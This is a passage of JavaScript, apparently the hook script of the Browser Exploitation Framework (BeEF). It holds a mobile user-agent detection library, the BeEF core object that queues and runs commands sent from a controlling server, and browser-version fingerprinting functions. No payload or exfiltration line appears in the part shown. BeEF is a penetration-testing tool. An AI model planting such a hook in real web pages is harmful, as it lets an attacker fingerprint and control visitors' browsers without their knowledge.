  1425. var devicePda = "pda";
  1426. var mini = "mini"; //Some mobile browsers put 'mini' in their names.
  1427. var mobile = "mobile"; //Some mobile browsers put 'mobile' in their user agent strings.
  1428. var mobi = "mobi"; //Some mobile browsers put 'mobi' in their user agent strings.
  1429.  
  1430. var maemo = "maemo";
  1431. var linux = "linux";
  1432. var qtembedded = "qt embedded"; //for Sony Mylo and others
  1433. var mylocom2 = "com2"; //for Sony Mylo also
  1434.  
  1435. var manuSonyEricsson = "sonyericsson";
  1436. var manuericsson = "ericsson";
  1437. var manuSamsung1 = "sec-sgh";
  1438. var manuSony = "sony";
  1439. var manuHtc = "htc"; //Popular Android and WinMo manufacturer
  1440.  
  1441. var svcDocomo = "docomo";
  1442. var svcKddi = "kddi";
  1443. var svcVodafone = "vodafone";
  1444.  
  1445. var disUpdate = "update"; //pda vs. update
  1446.  
  1447. var uagent = "";
  1448. if (navigator && navigator.userAgent)
  1449. uagent = navigator.userAgent.toLowerCase();
  1450.  
  1451. function DetectIphone()
  1452. {
  1453. if (uagent.search(deviceIphone) > -1)
  1454. {
  1455. if (DetectIpad() || DetectIpod())
  1456. return false;
  1457. else
  1458. return true;
  1459. }
  1460. else
  1461. return false;
  1462. }
  1463.  
  1464. function DetectIpod()
  1465. {
  1466. if (uagent.search(deviceIpod) > -1)
  1467. return true;
  1468. else
  1469. return false;
  1470. }
  1471.  
  1472. function DetectIpad()
  1473. {
  1474. if (uagent.search(deviceIpad) > -1 && DetectWebkit())
  1475. return true;
  1476. else
  1477. return false;
  1478. }
  1479.  
  1480. function DetectIphoneOrIpod()
  1481. {
  1482. if (uagent.search(deviceIphone) > -1 ||
  1483. uagent.search(deviceIpod) > -1)
  1484. return true;
  1485. else
  1486. return false;
  1487. }
  1488.  
  1489. function DetectIos()
  1490. {
  1491. if (DetectIphoneOrIpod() || DetectIpad())
  1492. return true;
  1493. else
  1494. return false;
  1495. }
  1496.  
  1497. function DetectAndroid()
  1498. {
  1499. if ((uagent.search(deviceAndroid) > -1) || DetectGoogleTV())
  1500. return true;
  1501. if (uagent.search(deviceHtcFlyer) > -1)
  1502. return true;
  1503. else
  1504. return false;
  1505. }
  1506.  
  1507. function DetectAndroidPhone()
  1508. {
  1509. if (DetectAndroid() && (uagent.search(mobile) > -1))
  1510. return true;
  1511. if (DetectOperaAndroidPhone())
  1512. return true;
  1513. if (uagent.search(deviceHtcFlyer) > -1)
  1514. return true;
  1515. else
  1516. return false;
  1517. }
  1518.  
  1519. function DetectAndroidTablet()
  1520. {
  1521. if (!DetectAndroid())
  1522. return false;
  1523.  
  1524. if (DetectOperaMobile())
  1525. return false;
  1526. if (uagent.search(deviceHtcFlyer) > -1)
  1527. return false;
  1528.  
  1529. if (uagent.search(mobile) > -1)
  1530. return false;
  1531. else
  1532. return true;
  1533. }
  1534.  
  1535.  
  1536. function DetectAndroidWebKit()
  1537. {
  1538. if (DetectAndroid() && DetectWebkit())
  1539. return true;
  1540. else
  1541. return false;
  1542. }
  1543.  
  1544.  
  1545. function DetectGoogleTV()
  1546. {
  1547. if (uagent.search(deviceGoogleTV) > -1)
  1548. return true;
  1549. else
  1550. return false;
  1551. }
  1552.  
  1553.  
  1554. function DetectWebkit()
  1555. {
  1556. if (uagent.search(engineWebKit) > -1)
  1557. return true;
  1558. else
  1559. return false;
  1560. }
  1561.  
  1562. function DetectS60OssBrowser()
  1563. {
  1564. if (DetectWebkit())
  1565. {
  1566. if ((uagent.search(deviceS60) > -1 ||
  1567. uagent.search(deviceSymbian) > -1))
  1568. return true;
  1569. else
  1570. return false;
  1571. }
  1572. else
  1573. return false;
  1574. }
  1575.  
  1576. function DetectSymbianOS()
  1577. {
  1578. if (uagent.search(deviceSymbian) > -1 ||
  1579. uagent.search(deviceS60) > -1 ||
  1580. uagent.search(deviceS70) > -1 ||
  1581. uagent.search(deviceS80) > -1 ||
  1582. uagent.search(deviceS90) > -1)
  1583. return true;
  1584. else
  1585. return false;
  1586. }
  1587.  
  1588. function DetectWindowsPhone7()
  1589. {
  1590. if (uagent.search(deviceWinPhone7) > -1)
  1591. return true;
  1592. else
  1593. return false;
  1594. }
  1595.  
  1596. function DetectWindowsMobile()
  1597. {
  1598. if (DetectWindowsPhone7())
  1599. return false;
  1600. if (uagent.search(deviceWinMob) > -1 ||
  1601. uagent.search(deviceIeMob) > -1 ||
  1602. uagent.search(enginePie) > -1)
  1603. return true;
  1604. if ((uagent.search(devicePpc) > -1) &&
  1605. !(uagent.search(deviceMacPpc) > -1))
  1606. return true;
  1607. if (uagent.search(manuHtc) > -1 &&
  1608. uagent.search(deviceWindows) > -1)
  1609. return true;
  1610. else
  1611. return false;
  1612. }
  1613.  
  1614. function DetectBlackBerry()
  1615. {
  1616. if (uagent.search(deviceBB) > -1)
  1617. return true;
  1618. if (uagent.search(vndRIM) > -1)
  1619. return true;
  1620. else
  1621. return false;
  1622. }
  1623.  
  1624. function DetectBlackBerryTablet()
  1625. {
  1626. if (uagent.search(deviceBBPlaybook) > -1)
  1627. return true;
  1628. else
  1629. return false;
  1630. }
  1631.  
  1632. function DetectBlackBerryWebKit()
  1633. {
  1634. if (DetectBlackBerry() &&
  1635. uagent.search(engineWebKit) > -1)
  1636. return true;
  1637. else
  1638. return false;
  1639. }
  1640.  
  1641. function DetectBlackBerryTouch()
  1642. {
  1643. if (DetectBlackBerry() &&
  1644. ((uagent.search(deviceBBStorm) > -1) ||
  1645. (uagent.search(deviceBBTorch) > -1) ||
  1646. (uagent.search(deviceBBBoldTouch) > -1) ||
  1647. (uagent.search(deviceBBCurveTouch) > -1) ))
  1648. return true;
  1649. else
  1650. return false;
  1651. }
  1652.  
  1653. function DetectBlackBerryHigh()
  1654. {
  1655. if (DetectBlackBerryWebKit())
  1656. return false;
  1657. if (DetectBlackBerry())
  1658. {
  1659. if (DetectBlackBerryTouch() ||
  1660. uagent.search(deviceBBBold) > -1 ||
  1661. uagent.search(deviceBBTour) > -1 ||
  1662. uagent.search(deviceBBCurve) > -1)
  1663. return true;
  1664. else
  1665. return false;
  1666. }
  1667. else
  1668. return false;
  1669. }
  1670.  
  1671. function DetectBlackBerryLow()
  1672. {
  1673. if (DetectBlackBerry())
  1674. {
  1675. if (DetectBlackBerryHigh() || DetectBlackBerryWebKit())
  1676. return false;
  1677. else
  1678. return true;
  1679. }
  1680. else
  1681. return false;
  1682. }
  1683.  
  1684.  
  1685. function DetectPalmOS()
  1686. {
  1687. if (uagent.search(devicePalm) > -1 ||
  1688. uagent.search(engineBlazer) > -1 ||
  1689. uagent.search(engineXiino) > -1)
  1690. {
  1691. if (DetectPalmWebOS())
  1692. return false;
  1693. else
  1694. return true;
  1695. }
  1696. else
  1697. return false;
  1698. }
  1699.  
  1700. function DetectPalmWebOS()
  1701. {
  1702. if (uagent.search(deviceWebOS) > -1)
  1703. return true;
  1704. else
  1705. return false;
  1706. }
  1707.  
  1708. function DetectWebOSTablet()
  1709. {
  1710. if (uagent.search(deviceWebOShp) > -1 &&
  1711. uagent.search(deviceTablet) > -1)
  1712. return true;
  1713. else
  1714. return false;
  1715. }
  1716.  
  1717. function DetectGarminNuvifone()
  1718. {
  1719. if (uagent.search(deviceNuvifone) > -1)
  1720. return true;
  1721. else
  1722. return false;
  1723. }
  1724.  
  1725.  
  1726. function DetectSmartphone()
  1727. {
  1728. if (DetectIphoneOrIpod()
  1729. || DetectAndroidPhone()
  1730. || DetectS60OssBrowser()
  1731. || DetectSymbianOS()
  1732. || DetectWindowsMobile()
  1733. || DetectWindowsPhone7()
  1734. || DetectBlackBerry()
  1735. || DetectPalmWebOS()
  1736. || DetectPalmOS()
  1737. || DetectGarminNuvifone())
  1738. return true;
  1739.  
  1740. return false;
  1741. };
  1742.  
  1743. function DetectArchos()
  1744. {
  1745. if (uagent.search(deviceArchos) > -1)
  1746. return true;
  1747. else
  1748. return false;
  1749. }
  1750.  
  1751. function DetectBrewDevice()
  1752. {
  1753. if (uagent.search(deviceBrew) > -1)
  1754. return true;
  1755. else
  1756. return false;
  1757. }
  1758.  
  1759. function DetectDangerHiptop()
  1760. {
  1761. if (uagent.search(deviceDanger) > -1 ||
  1762. uagent.search(deviceHiptop) > -1)
  1763. return true;
  1764. else
  1765. return false;
  1766. }
  1767.  
  1768. function DetectMaemoTablet()
  1769. {
  1770. if (uagent.search(maemo) > -1)
  1771. return true;
  1772. if ((uagent.search(linux) > -1)
  1773. && (uagent.search(deviceTablet) > -1)
  1774. && !DetectWebOSTablet()
  1775. && !DetectAndroid())
  1776. return true;
  1777. else
  1778. return false;
  1779. }
  1780.  
  1781. function DetectSonyMylo()
  1782. {
  1783. if (uagent.search(manuSony) > -1)
  1784. {
  1785. if (uagent.search(qtembedded) > -1 ||
  1786. uagent.search(mylocom2) > -1)
  1787. return true;
  1788. else
  1789. return false;
  1790. }
  1791. else
  1792. return false;
  1793. }
  1794.  
  1795. function DetectOperaMobile()
  1796. {
  1797. if (uagent.search(engineOpera) > -1)
  1798. {
  1799. if (uagent.search(mini) > -1 ||
  1800. uagent.search(mobi) > -1)
  1801. return true;
  1802. else
  1803. return false;
  1804. }
  1805. else
  1806. return false;
  1807. }
  1808.  
  1809. function DetectOperaAndroidPhone()
  1810. {
  1811. if ((uagent.search(engineOpera) > -1) &&
  1812. (uagent.search(deviceAndroid) > -1) &&
  1813. (uagent.search(mobi) > -1))
  1814. return true;
  1815. else
  1816. return false;
  1817. }
  1818.  
  1819. function DetectOperaAndroidTablet()
  1820. {
  1821. if ((uagent.search(engineOpera) > -1) &&
  1822. (uagent.search(deviceAndroid) > -1) &&
  1823. (uagent.search(deviceTablet) > -1))
  1824. return true;
  1825. else
  1826. return false;
  1827. }
  1828.  
  1829. function DetectSonyPlaystation()
  1830. {
  1831. if (uagent.search(devicePlaystation) > -1)
  1832. return true;
  1833. else
  1834. return false;
  1835. };
  1836.  
  1837. function DetectNintendo()
  1838. {
  1839. if (uagent.search(deviceNintendo) > -1 ||
  1840. uagent.search(deviceWii) > -1 ||
  1841. uagent.search(deviceNintendoDs) > -1)
  1842. return true;
  1843. else
  1844. return false;
  1845. };
  1846.  
  1847. function DetectXbox()
  1848. {
  1849. if (uagent.search(deviceXbox) > -1)
  1850. return true;
  1851. else
  1852. return false;
  1853. };
  1854.  
  1855. function DetectGameConsole()
  1856. {
  1857. if (DetectSonyPlaystation())
  1858. return true;
  1859. if (DetectNintendo())
  1860. return true;
  1861. if (DetectXbox())
  1862. return true;
  1863. else
  1864. return false;
  1865. };
  1866.  
  1867. function DetectKindle()
  1868. {
  1869. if (uagent.search(deviceKindle) > -1 &&
  1870. !DetectAndroid())
  1871. return true;
  1872. else
  1873. return false;
  1874. }
  1875.  
  1876. function DetectAmazonSilk()
  1877. {
  1878. if (uagent.search(engineSilk) > -1)
  1879. return true;
  1880. else
  1881. return false;
  1882. }
  1883.  
  1884. function DetectMobileQuick()
  1885. {
  1886. if (DetectTierTablet())
  1887. return false;
  1888.  
  1889. if (DetectSmartphone())
  1890. return true;
  1891.  
  1892. if (uagent.search(deviceMidp) > -1 ||
  1893. DetectBrewDevice())
  1894. return true;
  1895.  
  1896. if (DetectOperaMobile())
  1897. return true;
  1898.  
  1899. if (uagent.search(engineNetfront) > -1)
  1900. return true;
  1901. if (uagent.search(engineUpBrowser) > -1)
  1902. return true;
  1903. if (uagent.search(engineOpenWeb) > -1)
  1904. return true;
  1905.  
  1906. if (DetectDangerHiptop())
  1907. return true;
  1908.  
  1909. if (DetectMaemoTablet())
  1910. return true;
  1911. if (DetectArchos())
  1912. return true;
  1913.  
  1914. if ((uagent.search(devicePda) > -1) &&
  1915. !(uagent.search(disUpdate) > -1))
  1916. return true;
  1917. if (uagent.search(mobile) > -1)
  1918. return true;
  1919.  
  1920. if (DetectKindle() ||
  1921. DetectAmazonSilk())
  1922. return true;
  1923.  
  1924. return false;
  1925. };
  1926.  
  1927.  
  1928. function DetectMobileLong()
  1929. {
  1930. if (DetectMobileQuick())
  1931. return true;
  1932. if (DetectGameConsole())
  1933. return true;
  1934. if (DetectSonyMylo())
  1935. return true;
  1936.  
  1937. if (uagent.search(manuSamsung1) > -1 ||
  1938. uagent.search(manuSonyEricsson) > -1 ||
  1939. uagent.search(manuericsson) > -1)
  1940. return true;
  1941.  
  1942. if (uagent.search(svcDocomo) > -1)
  1943. return true;
  1944. if (uagent.search(svcKddi) > -1)
  1945. return true;
  1946. if (uagent.search(svcVodafone) > -1)
  1947. return true;
  1948.  
  1949.  
  1950. return false;
  1951. };
  1952.  
  1953.  
  1954. function DetectTierTablet()
  1955. {
  1956. if (DetectIpad()
  1957. || DetectAndroidTablet()
  1958. || DetectBlackBerryTablet()
  1959. || DetectWebOSTablet())
  1960. return true;
  1961. else
  1962. return false;
  1963. };
  1964.  
  1965. function DetectTierIphone()
  1966. {
  1967. if (DetectIphoneOrIpod())
  1968. return true;
  1969. if (DetectAndroidPhone())
  1970. return true;
  1971. if (DetectBlackBerryWebKit() && DetectBlackBerryTouch())
  1972. return true;
  1973. if (DetectWindowsPhone7())
  1974. return true;
  1975. if (DetectPalmWebOS())
  1976. return true;
  1977. if (DetectGarminNuvifone())
  1978. return true;
  1979. else
  1980. return false;
  1981. };
  1982.  
  1983. function DetectTierRichCss()
  1984. {
  1985. if (DetectMobileQuick())
  1986. {
  1987. if (DetectTierIphone() || DetectKindle())
  1988. return false;
  1989.  
  1990. if (DetectWebkit())
  1991. return true;
  1992. if (DetectS60OssBrowser())
  1993. return true;
  1994.  
  1995. if (DetectBlackBerryHigh())
  1996. return true;
  1997.  
  1998. if (DetectWindowsMobile())
  1999. return true;
  2000.  
  2001. if (uagent.search(engineTelecaQ) > -1)
  2002. return true;
  2003.  
  2004. else
  2005. return false;
  2006. }
  2007. else
  2008. return false;
  2009. };
  2010.  
  2011. function DetectTierOtherPhones()
  2012. {
  2013. if (DetectMobileLong())
  2014. {
  2015. if (DetectTierIphone() || DetectTierRichCss())
  2016. return false;
  2017.  
  2018. else
  2019. return true;
  2020. }
  2021. else
  2022. return false;
  2023. };
  2024.  
  2025.  
  2026. function InitDeviceScan()
  2027. {
  2028. isIphone = DetectIphoneOrIpod();
  2029. isAndroidPhone = DetectAndroidPhone();
  2030. isTierIphone = DetectTierIphone();
  2031. isTierTablet = DetectTierTablet();
  2032.  
  2033. isTierRichCss = DetectTierRichCss();
  2034. isTierGenericMobile = DetectTierOtherPhones();
  2035. };
  2036.  
  2037. InitDeviceScan()
  2038.  
  2039.  
  2040. //
  2041. // Copyright (c) 2006-2014 Wade Alcorn - wade@bindshell.net
  2042. // Browser Exploitation Framework (BeEF) - http://beefproject.com
  2043. // See the file 'doc/COPYING' for copying permission
  2044. //
  2045.  
  2046. /*!
  2047. * BeEF JS Library 0.4.4.9-alpha
  2048. * Register the BeEF JS on the window object.
  2049. */
  2050.  
  2051. $j = jQuery.noConflict();
  2052.  
  2053. if(typeof beef === 'undefined' && typeof window.beef === 'undefined') {
  2054.  
  2055. var BeefJS = {
  2056.  
  2057. version: '0.4.4.9-alpha',
  2058.  
  2059. // This get set to true during window.onload(). It's a useful hack when messing with document.write().
  2060. pageIsLoaded: false,
  2061.  
  2062. // An array containing functions to be executed by the window.onpopstate() method.
  2063. onpopstate: new Array(),
  2064.  
  2065. // An array containing functions to be executed by the window.onclose() method.
  2066. onclose: new Array(),
  2067.  
  2068. // An array containing functions to be executed by Beef.
  2069. commands: new Array(),
  2070.  
  2071. // An array containing all the BeEF JS components.
  2072. components: new Array(),
  2073.  
  2074. /**
  2075. * Adds a function to display debug messages (wraps console.log())
  2076. * @param: {string} the debug string to return
  2077. */
  2078. debug: function(msg) {
  2079. if (!false) return;
  2080. if (typeof console == "object" && typeof console.log == "function") {
  2081. console.log(msg);
  2082. } else {
  2083. // TODO: maybe add a callback to BeEF server for debugging purposes
  2084. //window.alert(msg);
  2085. }
  2086. },
  2087.  
  2088. /**
  2089. * Adds a function to execute.
  2090. * @param: {Function} the function to execute.
  2091. */
  2092. execute: function(fn) {
  2093. if ( typeof beef.websocket == "undefined"){
  2094. this.commands.push(fn);
  2095. }else{
  2096. fn();
  2097. }
  2098. },
  2099.  
  2100.  
  2101.  
  2102. /**
  2103. * Registers a component in BeEF JS.
  2104. * @params: {String} the component.
  2105. *
  2106. * Components are very important to register so the framework does not
  2107. * send them back over and over again.
  2108. */
  2109. regCmp: function(component) {
  2110. this.components.push(component);
  2111. }
  2112.  
  2113. };
  2114.  
  2115. window.beef = BeefJS;
  2116. }
  2117.  
  2118.  
  2119. //
  2120. // Copyright (c) 2006-2014 Wade Alcorn - wade@bindshell.net
  2121. // Browser Exploitation Framework (BeEF) - http://beefproject.com
  2122. // See the file 'doc/COPYING' for copying permission
  2123. //
  2124.  
  2125. /**
  2126. * @literal object: beef.browser
  2127. *
  2128. * Basic browser functions.
  2129. */
  2130. beef.browser = {
  2131.  
  2132. /**
  2133. * Returns the user agent that the browser is claiming to be.
  2134. * @example: beef.browser.getBrowserReportedName()
  2135. */
  2136. getBrowserReportedName:function () {
  2137. return navigator.userAgent;
  2138. },
  2139.  
  2140. /**
  2141. * Returns true if Avant Browser.
  2142. * @example: beef.browser.isA()
  2143. */
  2144. isA:function () {
  2145. return window.navigator.userAgent.match(/Avant TriCore/) != null;
  2146. },
  2147.  
  2148. /**
  2149. * Returns true if Iceweasel.
  2150. * @example: beef.browser.isI()
  2151. */
  2152. isI:function () {
  2153. return window.navigator.userAgent.match(/Iceweasel\/\d+\.\d/) != null;
  2154. },
  2155.  
  2156. /**
  2157. * Returns true if IE6.
  2158. * @example: beef.browser.isIE6()
  2159. */
  2160. isIE6:function () {
  2161. return !window.XMLHttpRequest && !window.globalStorage;
  2162. },
  2163.  
  2164. /**
  2165. * Returns true if IE7.
  2166. * @example: beef.browser.isIE7()
  2167. */
  2168. isIE7:function () {
  2169. return !!window.XMLHttpRequest && !window.chrome && !window.opera && !window.getComputedStyle && !window.globalStorage && !document.documentMode;
  2170. },
  2171.  
  2172. /**
  2173. * Returns true if IE8.
  2174. * @example: beef.browser.isIE8()
  2175. */
  2176. isIE8:function () {
  2177. return !!window.XMLHttpRequest && !window.chrome && !window.opera && !!document.documentMode && !!window.XDomainRequest && !window.performance;
  2178. },
  2179.  
  2180. /**
  2181. * Returns true if IE9.
  2182. * @example: beef.browser.isIE9()
  2183. */
  2184. isIE9:function () {
  2185. return !!window.XMLHttpRequest && !window.chrome && !window.opera && !!document.documentMode && !!window.XDomainRequest && !!window.performance && typeof navigator.msMaxTouchPoints === "undefined";
  2186. },
  2187.  
  2188. /**
  2189. *
  2190. * Returns true if IE10.
  2191. * @example: beef.browser.isIE10()
  2192. */
  2193. isIE10:function () {
  2194. return !!window.XMLHttpRequest && !window.chrome && !window.opera && !!document.documentMode && !!window.XDomainRequest && !!window.performance && typeof navigator.msMaxTouchPoints !== "undefined";
  2195. },
  2196.  
  2197. /**
  2198. * Returns true if IE.
  2199. * @example: beef.browser.isIE()
  2200. */
  2201. isIE:function () {
  2202. return this.isIE6() || this.isIE7() || this.isIE8() || this.isIE9() || this.isIE10();
  2203. },
  2204.  
  2205. /**
  2206. * Returns true if FF2.
  2207. * @example: beef.browser.isFF2()
  2208. */
  2209. isFF2:function () {
  2210. return !!window.globalStorage && !window.postMessage;
  2211. },
  2212.  
  2213. /**
  2214. * Returns true if FF3.
  2215. * @example: beef.browser.isFF3()
  2216. */
  2217. isFF3:function () {
  2218. return !!window.globalStorage && !!window.postMessage && !JSON.parse;
  2219. },
  2220.  
  2221. /**
  2222. * Returns true if FF3.5.
  2223. * @example: beef.browser.isFF3_5()
  2224. */
  2225. isFF3_5:function () {
  2226. return !!window.globalStorage && !!JSON.parse && !window.FileReader;
  2227. },
  2228.  
  2229. /**
  2230. * Returns true if FF3.6.
  2231. * @example: beef.browser.isFF3_6()
  2232. */
  2233. isFF3_6:function () {
  2234. return !!window.globalStorage && !!window.FileReader && !window.multitouchData && !window.history.replaceState;
  2235. },
  2236.  
  2237. /**
  2238. * Returns true if FF4.
  2239. * @example: beef.browser.isFF4()
  2240. */
  2241. isFF4:function () {
  2242. return !!window.globalStorage && !!window.history.replaceState && window.navigator.userAgent.match(/Firefox\/4\./) != null;
  2243. },
  2244.  
  2245. /**
  2246. * Returns true if FF5.
  2247. * @example: beef.browser.isFF5()
  2248. */
  2249. isFF5:function () {
  2250. return !!window.history.replaceState && window.navigator.userAgent.match(/Firefox\/5\./) != null;
  2251. },
  2252.  
  2253. /**
  2254. * Returns true if FF6.
  2255. * @example: beef.browser.isFF6()
  2256. */
  2257. isFF6:function () {
  2258. return !!window.history.replaceState && window.navigator.userAgent.match(/Firefox\/6\./) != null;
  2259. },
  2260.  
  2261. /**
  2262. * Returns true if FF7.
  2263. * @example: beef.browser.isFF7()
  2264. */
  2265. isFF7:function () {
  2266. return !!window.history.replaceState && window.navigator.userAgent.match(/Firefox\/7\./) != null;
  2267. },
  2268.  
  2269. /**
  2270. * Returns true if FF8.
  2271. * @example: beef.browser.isFF8()
  2272. */
  2273. isFF8:function () {
  2274. return !!window.history.replaceState && window.navigator.userAgent.match(/Firefox\/8\./) != null;
  2275. },
  2276.  
  2277. /**
  2278. * Returns true if FF9.
  2279. * @example: beef.browser.isFF9()
  2280. */
  2281. isFF9:function () {
  2282. return !!window.history.replaceState && window.navigator.userAgent.match(/Firefox\/9\./) != null;
  2283. },
  2284.  
  2285. /**
  2286. * Returns true if FF10.
  2287. * @example: beef.browser.isFF10()
  2288. */
  2289. isFF10:function () {
  2290. return !!window.history.replaceState && window.navigator.userAgent.match(/Firefox\/10\./) != null;
  2291. },
  2292.  
  2293. /**
  2294. * Returns true if FF11.
  2295. * @example: beef.browser.isFF11()
  2296. */
  2297. isFF11:function () {
  2298. return !!window.history.replaceState && window.navigator.userAgent.match(/Firefox\/11\./) != null;
  2299. },
  2300.  
  2301. /**
  2302. * Returns true if FF12
  2303. * @example: beef.browser.isFF12()
  2304. */
  2305. isFF12:function () {
  2306. return !!window.history.replaceState && window.navigator.userAgent.match(/Firefox\/12\./) != null;
  2307. },
  2308.  
  2309. /**
  2310. * Returns true if FF13
  2311. * @example: beef.browser.isFF13()
  2312. */
  2313. isFF13:function () {
  2314. return !!window.history.replaceState && window.navigator.userAgent.match(/Firefox\/13\./) != null;
  2315. },
  2316.  
  2317. /**
  2318. * Returns true if FF14
  2319. * @example: beef.browser.isFF14()
  2320. */
  2321. isFF14:function () {
  2322. return !!window.history.replaceState && window.navigator.userAgent.match(/Firefox\/14\./) != null;
  2323. },
  2324.  
  2325. /**
  2326. * Returns true if FF15
  2327. * @example: beef.browser.isFF15()
  2328. */
  2329. isFF15:function () {
  2330. return !!window.history.replaceState && window.navigator.userAgent.match(/Firefox\/15\./) != null;
  2331. },
  2332.  
  2333. /**
  2334. * Returns true if FF16
  2335. * @example: beef.browser.isFF16()
  2336. */
  2337. isFF16:function () {
  2338. return !!window.history.replaceState && window.navigator.userAgent.match(/Firefox\/16\./) != null;
  2339. },
  2340.  
  2341. /**
  2342. * Returns true if FF17
  2343. * @example: beef.browser.isFF17()
  2344. */
  2345. isFF17:function () {
  2346. return !!window.history.replaceState && window.navigator.userAgent.match(/Firefox\/17\./) != null;
  2347. },
  2348.  
  2349. /**
  2350. * Returns true if FF18
  2351. * @example: beef.browser.isFF18()
  2352. */
  2353. isFF18:function () {
  2354. return !!window.devicePixelRatio && !!window.history.replaceState && window.navigator.userAgent.match(/Firefox\/18\./) != null;
  2355. },
  2356.  
  2357. /**
  2358. * Returns true if FF19
  2359. * @example: beef.browser.isFF19()
  2360. */
  2361. isFF19:function () {
  2362. return !!window.devicePixelRatio && !!window.history.replaceState && typeof navigator.mozGetUserMedia != "undefined" && window.navigator.userAgent.match(/Firefox\/19\./) != null;
  2363. },
  2364.  
  2365. /**
  2366. * Returns true if FF20
  2367. * @example: beef.browser.isFF20()
  2368. */
  2369. isFF20:function () {
  2370. return !!window.devicePixelRatio && !!window.history.replaceState && typeof navigator.mozGetUserMedia != "undefined" && window.navigator.userAgent.match(/Firefox\/20\./) != null;
  2371. },
  2372.  
  2373. /**
  2374. * Returns true if FF21
  2375. * @example: beef.browser.isFF21()
  2376. */
  2377. isFF21:function () {
  2378. return !!window.devicePixelRatio && !!window.history.replaceState && typeof navigator.mozGetUserMedia != "undefined" && (typeof window.crypto != "undefined" && typeof window.crypto.getRandomValues != "undefined") && window.navigator.userAgent.match(/Firefox\/21\./) != null;
  2379. },
  2380.  
  2381. /**
  2382. * Returns true if FF22
  2383. * @example: beef.browser.isFF22()
  2384. */
  2385. isFF22:function () {
  2386. return !!window.devicePixelRatio && !!window.history.replaceState && typeof navigator.mozGetUserMedia != "undefined" && (typeof window.crypto != "undefined" && typeof window.crypto.getRandomValues != "undefined") && window.navigator.userAgent.match(/Firefox\/22\./) != null;
  2387. },
  2388.  
  2389. /**
  2390. * Returns true if FF23
  2391. * @example: beef.browser.isFF23()
  2392. */
  2393. isFF23:function () {
  2394. return !!window.devicePixelRatio && !!window.history.replaceState && typeof navigator.mozGetUserMedia != "undefined" && (typeof window.crypto != "undefined" && typeof window.crypto.getRandomValues != "undefined") && window.navigator.userAgent.match(/Firefox\/23\./) != null;
  2395. },
  2396.  
  2397. /**
  2398. * Returns true if FF24
  2399. * @example: beef.browser.isFF24()
  2400. */
  2401. isFF24:function () {
  2402. return !!window.devicePixelRatio && !!window.history.replaceState && typeof navigator.mozGetUserMedia != "undefined" && (typeof window.crypto != "undefined" && typeof window.crypto.getRandomValues != "undefined") && window.navigator.userAgent.match(/Firefox\/24\./) != null;
  2403. },
  2404.  
  2405. /**
  2406. * Returns true if FF25
  2407. * @example: beef.browser.isFF25()
  2408. */
  2409. isFF25:function () {
  2410. return !!window.devicePixelRatio && !!window.history.replaceState && typeof navigator.mozGetUserMedia != "undefined" && (typeof window.crypto != "undefined" && typeof window.crypto.getRandomValues != "undefined") && window.navigator.userAgent.match(/Firefox\/25\./) != null;
  2411. },
  2412.  
  2413. /**
  2414. * Returns true if FF26
  2415. * @example: beef.browser.isFF26()
  2416. */
  2417. isFF26:function () {
  2418. return !!window.devicePixelRatio && !!window.history.replaceState && typeof navigator.mozGetUserMedia != "undefined" && (typeof window.crypto != "undefined" && typeof window.crypto.getRandomValues != "undefined") && window.navigator.userAgent.match(/Firefox\/26./) != null;
  2419. },
  2420.  
  2421. /**
  2422. * Returns true if FF.
  2423. * @example: beef.browser.isFF()
  2424. */
  2425. isFF:function () {
  2426. return this.isFF2() || this.isFF3() || this.isFF3_5() || this.isFF3_6() || this.isFF4() || this.isFF5() || this.isFF6() || this.isFF7() || this.isFF8() || this.isFF9() || this.isFF10() || this.isFF11() || this.isFF12() || this.isFF13() || this.isFF14() || this.isFF15() || this.isFF16() || this.isFF17() || this.isFF18() || this.isFF19() || this.isFF20() || this.isFF21() || this.isFF22() || this.isFF23() || this.isFF24() || this.isFF25() || this.isFF26();
  2427. },
  2428.  
  2429. /**
  2430. * Returns true if Safari 4.xx
  2431. * @example: beef.browser.isS4()
  2432. */
  2433. isS4:function () {
  2434. return (window.navigator.userAgent.match(/ Version\/4\.\d/) != null && window.navigator.userAgent.match(/Safari\/\d/) != null && !window.globalStorage && !!window.getComputedStyle && !window.opera && !window.chrome && !("MozWebSocket" in window));
  2435. },
  2436.  
  2437. /**
  2438. * Returns true if Safari 5.xx
  2439. * @example: beef.browser.isS5()
  2440. */
  2441. isS5:function () {
  2442. return (window.navigator.userAgent.match(/ Version\/5\.\d/) != null && window.navigator.userAgent.match(/Safari\/\d/) != null && !window.globalStorage && !!window.getComputedStyle && !window.opera && !window.chrome && !("MozWebSocket" in window));
  2443. },
  2444.  
  2445. /**
  2446. * Returns true if Safari 6.xx
  2447. * @example: beef.browser.isS6()
  2448. */
  2449. isS6:function () {
  2450. return (window.navigator.userAgent.match(/ Version\/6\.\d/) != null && window.navigator.userAgent.match(/Safari\/\d/) != null && !window.globalStorage && !!window.getComputedStyle && !window.opera && !window.chrome && !("MozWebSocket" in window));
  2451. },
  2452.  
  2453. /**
  2454. * Returns true if Safari.
  2455. * @example: beef.browser.isS()
  2456. */
  2457. isS:function () {
  2458. return this.isS4() || this.isS5() || this.isS6();
  2459. },
  2460.  
  2461. /**
  2462. * Returns true if Chrome 5.
  2463. * @example: beef.browser.isC5()
  2464. */
  2465. isC5:function () {
  2466. return (!!window.chrome && !window.webkitPerformance && window.navigator.appVersion.match(/Chrome\/(\d+)\./)) && ((parseInt(window.navigator.appVersion.match(/Chrome\/(\d+)\./)[1], 10) == 5) ? true : false);
  2467. },
  2468.  
  2469. /**
  2470. * Returns true if Chrome 6.
  2471. * @example: beef.browser.isC6()
  2472. */
  2473. isC6:function () {
  2474. return (!!window.chrome && !!window.webkitPerformance && window.navigator.appVersion.match(/Chrome\/(\d+)\./)) && ((parseInt(window.navigator.appVersion.match(/Chrome\/(\d+)\./)[1], 10) == 6) ? true : false);
  2475. },
  2476.  
  2477. /**
  2478. * Returns true if Chrome 7.
  2479. * @example: beef.browser.isC7()
  2480. */
  2481. isC7:function () {
  2482. return (!!window.chrome && !!window.webkitPerformance && window.navigator.appVersion.match(/Chrome\/(\d+)\./)) && ((parseInt(window.navigator.appVersion.match(/Chrome\/(\d+)\./)[1], 10) == 7) ? true : false);
  2483. },
  2484.  
  2485. /**
  2486. * Returns true if Chrome 8.
  2487. * @example: beef.browser.isC8()
  2488. */
  2489. isC8:function () {
  2490. return (!!window.chrome && !!window.webkitPerformance && window.navigator.appVersion.match(/Chrome\/(\d+)\./)) && ((parseInt(window.navigator.appVersion.match(/Chrome\/(\d+)\./)[1], 10) == 8) ? true : false);
  2491. },
  2492.  
  2493. /**
  2494. * Returns true if Chrome 9.
  2495. * @example: beef.browser.isC9()
